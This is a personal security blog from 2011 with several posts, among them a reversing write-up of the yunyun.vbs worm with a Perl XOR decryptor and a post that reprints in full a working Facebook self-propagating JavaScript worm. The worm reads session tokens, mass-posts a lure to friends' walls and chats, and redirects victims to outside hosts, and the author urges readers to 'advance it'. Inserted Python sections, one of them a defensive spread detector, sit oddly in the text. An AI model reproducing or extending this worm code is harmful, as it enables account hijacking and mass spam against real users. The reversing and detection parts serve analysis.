2011/11/19

Commercial Coding Pt2

Well, as the title says, this is in reference to my old blog post on coding commercially. Well, it sucks: I have to deal with .NET/C#, VB.NET, Java. I wake in the middle of the night screaming "no, no, not the VM, please let me talk to the hardware, please". I'm scaring the shit out of my wife and my mum is getting pissed because I'm always on her Windows desktop, reversing something or making some guy or company happy with .NET :/ Anyways, it's shit.

2011/07/22

Reversing the 'yunyun.vbs' virus

Hello, I have been bored, tired and coding :) as usual. I got a pen drive some time last
year and I realized there were too many 'Thumb.db' files, so I vi'd Thumb.db
and guess what I saw:
'www.muslimah.or.id;==================================== my name:Yuyun 1.0

' ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then...

Yes, that is the yunyun alright, coded in Microsoft VBS. Then I got interested
in the encrypted part of the code; I wanted to see what's in there.
The encryption and decryption routine uses XOR with a constant, which means it's the same
algorithm in and out. Here is the en/decryption routine:

hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next

As you can see this is very simple, so I wrote a little Perl script to decrypt it:

#!/usr/bin/perl

use strict;
use warnings;

my $vir  = "";
my $line = 0;

# Read-only is enough here; the original "+<" (read/write) mode is not needed.
open(my $VIR, "<", "yunyun.vbs") || die("noopeno :( $!");
while (<$VIR>) {
  $line++;
  # Lines 1-46 are the clear-text stub; the XOR-7 blob starts on line 47.
  if ($line >= 47) {
    $vir .= $_;
  }
}
close($VIR);

# split(//) gives one character per element. The original split(/ */) treated
# runs of spaces as separators and silently dropped them, losing every
# plaintext character that encrypts to a space (e.g. the apostrophe, 0x27 ^ 7 = 0x20).
my @vx = split(//, $vir);

# XOR is its own inverse, so the worm's Chr(t Xor 7) loop also decrypts.
foreach my $i (@vx) {
  print chr(ord($i) ^ 7);
}

I have made it simpler so anyone can learn from it.
Anyways, with that the mystery was unveiled, and then came mystery 2:
there's a part that needs formatting, and this virus/worm is really cool at handling
newlines. Anyway, you need to format it and then translate it; here's the code to format it:

$adv = 'Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^!  www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-Araf:26)';


$adv =~ s/\>/\n/go;

print $adv;
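Both steps above, the XOR-7 decryption and the '>'-to-newline expansion of the message block, as an added Python example that is neither the worm's code nor the author's Perl; it also goes beyond the page's fixed key by recovering the key from known VBScript plaintext when the key is not known. The sample ciphertext is constructed here by encrypting three lines from the listing above with key 7.

```python
#!/usr/bin/env python3
"""XOR decryption of a yunyun.vbs-style blob, recovery of the single-byte
key when it is unknown, and expansion of the '>'-separated message block.
All sample data in this file is constructed for the example."""

from typing import Optional

# Known plaintext: strings any VBScript dropper of this family will contain.
KNOWN_PLAINTEXT = (b"CreateObject", b"On Error Resume Next", b"WScript")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte. Since x ^ k ^ k == x the same
    function both encrypts and decrypts, which is why the worm ships a
    single hsl=hsl+Chr(t Xor 7) loop for both directions."""
    return bytes(b ^ key for b in data)


def recover_key(cipher: bytes) -> Optional[int]:
    """Try all 256 single-byte keys and return the one whose output
    contains a known plaintext marker, or None. Only one key can
    reproduce a multi-byte marker, so a hit is unambiguous."""
    for key in range(256):
        if any(m in xor_bytes(cipher, key) for m in KNOWN_PLAINTEXT):
            return key
    return None


def expand_payload(adv: str) -> str:
    """The decrypted message uses '>' as its line separator (the Perl
    substitution above); turn it into real lines."""
    return adv.replace(">", "\n")


# Constructed sample: three lines of the worm's clear-text prologue,
# encrypted with key 7 exactly as the VBS routine would do it.
SAMPLE_PLAIN = (b"On Error Resume Next\r\n"
                b'Set fso = CreateObject("scripting.filesystemobject")\r\n'
                b'Set ws = CreateObject("wscript.Shell")\r\n')
SAMPLE_CIPHER = xor_bytes(SAMPLE_PLAIN, 7)


if __name__ == "__main__":
    key = recover_key(SAMPLE_CIPHER)
    print("recovered key:", key)
    print(xor_bytes(SAMPLE_CIPHER, key).decode("latin-1"))
    print(expand_payload("Yuyun Ver 1.0 ^_^!>second line"))
```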


Ok, so uhm, that's that. I have more virii/worms, but take this for starters.
Oh, and if anyone has the 'stuxnet' worm please let me have a binary copy
in tar.gz format.

Next time.

2011/05/06

University of Ghana Website hacked for 2+ years

I complained about the University of Ghana being hacked by "someone" and having
cloaked ads inserted into their pages; well, it seems no one took notice of this.

So I am going to loudmouth more details. Remember, this is not to disgrace or
tarnish the image of the webmaster of the University of Ghana website, but it
is to awaken the sleepy and often loud and uneducated bureaucrats in Ghana
at large. The problem with Ghana is that more and more people are beginning to see
the advantages of IT and are greedily trying to squeeze everything out of anyone
that has knowledge or skills in this field.

"Your site is hacked!" is a very scary statement, and if I should approach them
I would get the "you did, huh!" question, which would piss me off and I'd probably
slap the shit out of someone; in order to avoid that I can blog :)

To verify this absurd claim from moi (laudarch), do the following:

It's been a while so I just share.

Facebook Worm

Hello, it's been really long and a lot of things have happened; anyways, I'll tell you about that later.

What I want to talk about now is a Facebook worm I got a couple of days ago.
I received a mail from a Facebook friend and it had a very suspicious title:


"
This will leave you speechless)
http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791
Osama Bin Laden EXECUTION Video!
Navy Seals raid Bin Ladens hideout and execute him!
"

Weird, huh? Even CNN didn't show a video, so how come this group has it?
The page has currently been removed. It's funny when these things happen
and people fall for it anyway. It had instructions to copy and paste a JavaScript
code into your address bar after you are logged in to Facebook.

The interesting thing about this worm is how it spreads:
it uses the "stupidity" of humans. Yes, stupidity!

My brother and I tried designing a worm on Facebook once, and we came up
with different algorithms on how to spread using apps, mailing
and posting comments, and all of this could not be automatic; I even came up
with Mozilla extensions to do the job.


The future of worms and viruses is social networking. I watched as the group
grew from 8,000 to 60,000+ in less than two hours; now that is power. Given the
intelligence of the average Joe and Jane, this would work for the next 10 to 15
years.

I copied the JavaScript code that spread on the victim's wall and profile to the
victim's friends et al.

Below is the code; learn from it, advance it and be wise :)


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
 
 var nameEQ = name + "=";
 var ca = document.cookie.split(';');
 for(var i=0;i < ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
 }
 return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
      "http://ow.ly/4LNpd",
      "http://clickily.ws/zyaeom"
     );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Bin-Laden-Execution-Video/207043242659899?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

 if(http1.readyState == 4 && http1.status == 200) { // If state = success
  
  var response1 = http1.responseText;
  
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  
  //alert(response4.toSource());
  
  var count = 0;
  
  for(uid in response1.payload.entries){
   
   if(count < 400){
    
    //alert("SENT TO "+response1.payload.entries[count].uid);

    // Loop to send messages
   
    // New XMLHttp object
    var httpwp = new XMLHttpRequest();
       
    var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
    var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
    var statusmessage="This will leave you speechless";
    var title="Osama Bin Laden EXECUTION Video!";
//    var link="http://clickily.ws/e4lqeg?http://clickily.ws/y2ls36?";
    var link = randLink[Math.floor(randLink.length*Math.random())];
    var description="Navy Seals raid Bin Ladens hideout and execute him! ";
    var picture="http://cooldadssz.co.cc/laden.png";
    
    var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
    
    httpwp.open("POST", urlwp, true);
    
    //Send the proper header information along with the request
    
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");     
    
    httpwp.onreadystatechange = function() { //Call a function when the state changes.
     if(httpwp.readyState == 4 && httpwp.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }

    }

    httpwp.send(paramswp);
 
   }

   count++; // increment counter
  
  }
    
  http1.close; // Close the connection
  
  
  
 }
 
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
 if(http3.readyState == 4 && http3.status == 200) {
  
  var response3 = http3.responseText;
  
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  
  var count = 0;
  
  for(property in response3.payload.buddy_list.nowAvailableList){
   
   if(count < 100){
    
    // Loop to send messages
   
    // New XMLHttp object
    var httpc = new XMLHttpRequest();
    
    // Generate random message ID
        
    var msgid = Math.floor(Math.random()*1000000);
    
    var time = Math.round(new Date().getTime() / 1000);
    
    var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
    var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
    httpc.open("POST", urlc, true);
    
    //Send the proper header information along with the request
    httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpc.setRequestHeader("Content-length", paramsc.length);
    httpc.setRequestHeader("Connection", "close");
    
    httpc.onreadystatechange = function() { //Call a function when the state changes.
     if(httpc.readyState == 4 && httpc.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }
    }
    httpc.send(paramsc);
 
   }
   
   //alert(property);
   count++; // increment counter
  
  }
  
  http3.close; // Close the connection
  
 }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
 if(http4.readyState == 4 && http4.status == 200) {
   
  http4.close; // Close the connection
  
 }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
 if(http5.readyState == 4 && http5.status == 200) {
   
  http5.close; // Close the connection
  
 }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none"; 
document.getElementById('contentArea').innerHTML="
< center>
< img src="http://www.hindustantimes.com/images/loading_gif.gif" />;
Please wait...";
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000); 

As you can see, this worm was written very well, with everything happening in the background
thanks to the power of AJAX.
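A defender-side counterpart, added here and not part of the worm or the original post: because the script runs inside the victim's own logged-in session and reads the anti-CSRF tokens (post_form_id, fb_dtsg) straight from the page, server-side CSRF checks cannot stop it, but the burst of one identical link to hundreds of distinct walls and chat recipients within seconds is a clear signal. The log format, endpoint paths (taken from the worm above) and sample lines are constructed for this example.

```python
#!/usr/bin/env python3
"""Server-side detection of the worm's fan-out: one session pushing the
same link to many distinct recipients within a short window, whether
through the wall composer or the chat endpoint.

Log lines are constructed for this example (not real Facebook logs).
Fields: unix_time viewer_id endpoint target_id url"""

from collections import defaultdict

# Constructed sample: a worm-driven session (viewer 1001) next to a
# normal user (viewer 2002) who shares two different links an hour apart.
SAMPLE_LOG = """\
1304630000 1001 /ajax/profile/composer.php 500 http://ow.ly/4LNpd
1304630001 1001 /ajax/profile/composer.php 501 http://ow.ly/4LNpd
1304630001 1001 /ajax/profile/composer.php 502 http://ow.ly/4LNpd
1304630002 1001 /ajax/profile/composer.php 503 http://ow.ly/4LNpd
1304630002 1001 /ajax/chat/send.php 504 http://ow.ly/4LNpd
1304630003 1001 /ajax/chat/send.php 505 http://ow.ly/4LNpd
1304630000 2002 /ajax/profile/composer.php 600 http://example.org/a
1304633600 2002 /ajax/profile/composer.php 601 http://example.org/b
"""

# The worm hits up to 400 walls and 100 chats in one burst, so even a
# handful of distinct targets inside a minute is far outside interactive use.
WINDOW_SECONDS = 60
MIN_DISTINCT_TARGETS = 5


def parse_log(text):
    """Yield (time, viewer, endpoint, target, url) tuples."""
    for line in text.splitlines():
        ts, viewer, endpoint, target, url = line.split()
        yield int(ts), viewer, endpoint, target, url


def find_fanout_sessions(text, window=WINDOW_SECONDS,
                         min_targets=MIN_DISTINCT_TARGETS):
    """Return {viewer: (distinct_targets, url)} for every viewer who sent
    one URL to at least `min_targets` distinct recipients within `window`
    seconds; the endpoint used does not matter."""
    events = defaultdict(list)
    for ts, viewer, _endpoint, target, url in parse_log(text):
        events[viewer].append((ts, target, url))
    flagged = {}
    for viewer, evs in events.items():
        evs.sort()
        for i, (t0, _, url0) in enumerate(evs):
            targets = {tgt for ts, tgt, url in evs[i:]
                       if ts - t0 <= window and url == url0}
            if len(targets) >= min_targets:
                flagged[viewer] = (len(targets), url0)
                break
    return flagged


if __name__ == "__main__":
    for viewer, (n, url) in find_fanout_sessions(SAMPLE_LOG).items():
        print(f"viewer {viewer}: {url} sent to {n} recipients in {WINDOW_SECONDS}s")
```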

I'm going to take time and fully reverse this and add comments on how to extend it; until then I'm writing something else :)
Oh, I have to post the virii I have been reversing for some time now :)